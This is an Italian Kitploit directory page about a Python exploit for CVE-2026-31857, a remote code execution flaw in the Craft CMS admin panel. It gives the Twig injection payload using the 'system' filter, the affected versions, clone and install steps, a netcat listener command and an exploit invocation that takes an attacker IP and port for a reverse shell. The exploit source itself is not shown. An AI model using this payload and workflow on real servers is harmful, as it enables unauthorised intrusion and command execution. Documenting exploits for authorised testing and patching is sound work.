Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31857 — Craft CMS RCE tramite condizionali relazionali nel pannello di controllo | Kitploit
Strumenti/GitHubGitHub/0xtatsuki/cve-2026-31857
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitSicurezza WebPenetration TestingRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHub0xtatsuki/cve-2026-31857

CVE-2026-31857

Craft CMS RCE tramite condizionali relazionali nel pannello di controllo

1 giorno faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-31857 - Exploit RCE di Craft CMS

Exploit Python per una vulnerabilità RCE nel pannello di amministrazione di Craft CMS, attivata tramite l'endpoint admin/actions/element-indexes/count-elements. L'iniezione passa attraverso il campo elementIds di una condizione RelatedToConditionRule, che viene interpretata come Twig lato server e sfruttata tramite il filtro system per eseguire un comando arbitrario ({{[['<cmd>']|filter('system')]}}).

Vulnerabilità divulgata da NeoSprings

Versioni interessate :

  • >= 5.0.0-RC1, <= 5.9.8
  • >= 4.0.0-beta.1, <= 4.17.3

Riferimenti :

  • https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc
  • https://nvd.nist.gov/vuln/detail/cve-2026-31857

Installazione

$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt

Utilizzo

  1. Avvia il listener prima di eseguire l'exploit :
$ nc -lvnp <attacker_port>
  1. Esegui l'exploit :
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>

Disclaimer

Questo strumento è fornito solo a scopo didattico e per esercitazioni autorizzate (CTF, penetration testing su contratto o test locali). Utilizzarlo contro qualsiasi sistema senza esplicita autorizzazione è illegale.

Scarica lo strumento